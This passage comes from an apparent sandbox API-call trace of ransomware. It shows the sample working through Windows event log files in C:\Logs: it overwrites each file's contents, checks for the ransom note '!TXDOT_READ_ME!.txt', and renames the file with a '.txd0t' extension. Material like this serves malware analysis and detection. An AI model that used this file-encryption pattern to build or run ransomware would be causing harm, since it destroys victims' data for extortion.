returned="Microsoft-Windows-Ntfs%4Operational.evtx" [0089.168] StrCpyW (in: psz1=0xed2e30, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.168] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.168] GetProcessHeap () returned 0xe30000 [0089.168] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2e18 | out: hHeap=0xe30000) returned 1 [0089.168] CloseHandle (hObject=0x474) returned 1 [0089.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.txd0t")) returned 1 [0089.169] SetEvent (hEvent=0x40c) returned 1 [0089.169] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.174] StrCpyW (in: psz1=0x4a9f700, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0089.174] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t" [0089.174] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned 0 [0089.174] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", dwFileAttributes=0x80) returned 1 [0089.174] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.175] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.175] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.175] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.176] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6c0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6c0*=0x11000, lpOverlapped=0x0) returned 1 [0089.178] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.178] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6c4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6c4*=0x11000, lpOverlapped=0x0) returned 1 [0089.178] FlushFileBuffers (hFile=0x474) returned 1 [0089.316] GetProcessHeap () returned 0xe30000 [0089.316] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x154) returned 0xed4530 [0089.316] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0089.316] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0089.316] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.316] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.316] GetProcessHeap () returned 0xe30000 [0089.316] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.316] CloseHandle (hObject=0x474) returned 1 [0089.316] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.txd0t")) returned 1 [0089.317] SetEvent (hEvent=0x40c) returned 1 [0089.317] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.318] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" [0089.318] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t" [0089.318] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned 0 [0089.319] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", dwFileAttributes=0x80) returned 1 [0089.319] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.319] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.320] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.320] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.321] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.321] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11000, lpOverlapped=0x0) returned 1 [0089.323] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.323] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11000, lpOverlapped=0x0) returned 1 [0089.323] FlushFileBuffers (hFile=0x474) returned 1 [0089.336] GetProcessHeap () returned 0xe30000 [0089.336] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1458 [0089.336] StrCpyW (in: psz1=0xed1458, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" [0089.336] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="Microsoft-Windows-SmbClient%4Security.evtx" [0089.336] StrCpyW (in: psz1=0xed1470, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.336] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.336] GetProcessHeap () returned 0xe30000 [0089.336] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1458 | out: hHeap=0xe30000) returned 1 [0089.336] CloseHandle (hObject=0x474) returned 1 [0089.336] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.txd0t")) returned 1 [0089.337] SetEvent (hEvent=0x40c) returned 1 [0089.337] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.340] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" [0089.340] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t" [0089.340] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned 0 [0089.340] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", dwFileAttributes=0x80) returned 1 [0089.341] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.341] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.341] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.341] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.342] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.342] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0089.348] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.348] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0089.348] FlushFileBuffers (hFile=0x460) returned 1 [0089.365] GetProcessHeap () returned 0xe30000 [0089.365] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xed7f88 [0089.365] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" [0089.365] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="Microsoft-Windows-SMBServer%4Connectivity.evtx" [0089.366] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.366] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.366] GetProcessHeap () returned 0xe30000 [0089.366] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.366] CloseHandle (hObject=0x460) returned 1 [0089.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.txd0t")) returned 1 [0089.366] SetEvent (hEvent=0x40c) returned 1 [0089.366] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.370] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" [0089.370] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t" [0089.370] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t") returned 0 [0089.370] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.374] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.374] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.374] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.374] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.375] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.375] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11000, lpOverlapped=0x0) returned 1 [0089.378] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.378] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11000, lpOverlapped=0x0) returned 1 [0089.381] FlushFileBuffers (hFile=0x474) returned 1 [0089.384] GetProcessHeap () returned 0xe30000 [0089.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1c70 [0089.384] StrCpyW (in: psz1=0xed1c70, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" [0089.384] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="Microsoft-Windows-Store%4Operational.evtx" [0089.384] StrCpyW (in: psz1=0xed1c88, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.384] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.384] GetProcessHeap () returned 0xe30000 [0089.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1c70 | out: hHeap=0xe30000) returned 1 [0089.384] CloseHandle (hObject=0x474) returned 1 [0089.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.txd0t")) returned 1 [0089.385] SetEvent (hEvent=0x40c) returned 1 [0089.385] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.386] StrCpyW (in: psz1=0x4a9f730, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0089.386] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t" [0089.386] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned 0 [0089.386] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", dwFileAttributes=0x80) returned 1 [0089.386] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.387] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.387] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.387] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.388] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.388] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6f0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6f0*=0x11000, lpOverlapped=0x0) returned 1 [0089.401] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.401] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6f4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6f4*=0x11000, lpOverlapped=0x0) returned 1 [0089.401] FlushFileBuffers (hFile=0x474) returned 1 [0089.410] GetProcessHeap () returned 0xe30000 [0089.410] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xed7f88 [0089.410] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0089.410] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0089.410] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.410] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.411] GetProcessHeap () returned 0xe30000 [0089.411] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.411] CloseHandle (hObject=0x474) returned 1 [0089.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.txd0t")) returned 1 [0089.411] SetEvent (hEvent=0x40c) returned 1 [0089.411] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0089.414] StrCpyW (in: psz1=0x4a9f700, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0089.414] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t" [0089.414] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned 0 [0089.415] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.415] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.415] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=69632) returned 1 [0089.415] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.415] WriteFile (in: hFile=0x478, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0089.416] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.416] ReadFile (in: hFile=0x478, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x4a9f6c0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6c0*=0x11000, lpOverlapped=0x0) returned 1 [0089.424] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.424] WriteFile (in: hFile=0x478, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x4a9f6c4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6c4*=0x11000, lpOverlapped=0x0) returned 1 [0089.424] FlushFileBuffers (hFile=0x478) returned 1 [0089.610] GetProcessHeap () returned 0xe30000 [0089.610] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x150) returned 0xed4530 [0089.610] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0089.610] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0089.610] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.611] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 